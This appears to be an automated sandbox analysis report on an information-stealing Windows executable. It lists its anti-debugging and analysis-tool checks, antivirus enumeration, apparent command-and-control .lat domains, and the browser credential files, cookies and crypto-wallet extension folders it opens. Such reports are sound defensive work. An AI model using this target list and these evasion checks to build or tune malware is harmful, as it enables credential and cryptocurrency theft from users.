Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: MaZjv5XeQi.exe, 00000000.00000003.2158348815.00000000057C5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2233422671.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: MaZjv5XeQi.exe, 00000000.00000003.2158348815.00000000057C5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: MaZjv5XeQi.exe, 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: NTICE
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: SICE
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009DE110 LdrInitializeThunk

HIPS / PFW / Operating System Protection Evasion

Source: MaZjv5XeQi.exe | String found in binary or memory: bashfulacid.lat
Source: MaZjv5XeQi.exe | String found in binary or memory: curverpluch.lat
Source: MaZjv5XeQi.exe | String found in binary or memory: tentabatte.lat
Source: MaZjv5XeQi.exe | String found in binary or memory: shapestickyr.lat
Source: MaZjv5XeQi.exe | String found in binary or memory: talkynicer.lat
Source: MaZjv5XeQi.exe | String found in binary or memory: slipperyloo.lat
Source: MaZjv5XeQi.exe | String found in binary or memory: manyrestro.lat
Source: MaZjv5XeQi.exe | String found in binary or memory: observerfry.lat
Source: MaZjv5XeQi.exe | String found in binary or memory: wordyfindy.lat
Source: MaZjv5XeQi.exe, MaZjv5XeQi.exe, 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2240279376.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286686825.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288668852.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: MaZjv5XeQi.exe, 00000000.00000003.2240416657.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ws Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: MaZjv5XeQi.exe PID: 5608, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
Source: MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: MaZjv5XeQi.exe, 00000000.00000003.2209696792.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: MaZjv5XeQi.exe, 00000000.00000003.2209696792.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: aljgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofkfgppdlbm|
Source: MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: MaZjv5XeQi.exe, 00000000.00000003.2209696792.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffla
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffla
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
